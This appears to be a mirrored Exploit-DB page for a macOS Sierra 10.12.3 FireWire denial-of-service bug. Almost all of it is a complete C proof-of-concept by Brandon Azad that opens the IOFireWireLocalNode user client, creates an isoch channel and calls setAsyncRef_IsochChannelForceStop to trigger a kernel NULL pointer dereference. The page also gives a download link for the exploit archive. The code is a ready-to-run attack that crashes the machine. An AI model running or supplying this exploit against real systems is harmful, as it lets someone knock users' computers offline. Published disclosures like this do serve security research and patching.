Apple macOS Sierra 10.12.3 – ‘IOFireWireFamily-null-deref’ FireWire Port Denial of Service - 体验盒子

作者： Brandon Azad

日期： 2017-08-16

类别：

dos

平台：

macos

来源：https://www.exploit-db.com/exploits/44236/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

/*

* IOFireWireFamily-null-deref.c

* Brandon Azad

*

* NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop.

*

* Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip

*/

#include <IOKit/IOKitLib.h>

int main() {

int ret = 0;

io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,

IOServiceMatching("IOFireWireLocalNode"));

if (service == IO_OBJECT_NULL) {

ret = 1;

goto fail1;

}

io_connect_t connect;

kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);

IOObjectRelease(service);

if (kr != KERN_SUCCESS) {

ret = 2;

goto fail1;

}

// isochChannel_Create

uint64_t args[3] = { 0, 0x100, 0x100 };

uint64_t handle = 0;

uint32_t output_count = 1;

kr = IOConnectCallMethod(connect, 57,

args, sizeof(args) / sizeof(*args), NULL, 0,

&handle, &output_count, NULL, NULL);

if (kr != KERN_SUCCESS) {

ret = 3;

goto fail2;

}

// setAsyncRef_IsochChannelForceStop

kr = IOConnectCallMethod(connect, 90,

&handle, 1, NULL, 0,

NULL, NULL, NULL, NULL);

if (kr != KERN_SUCCESS) {

ret = 4;

goto fail2;

}

fail2:

IOServiceClose(connect);

fail1:

return ret;

}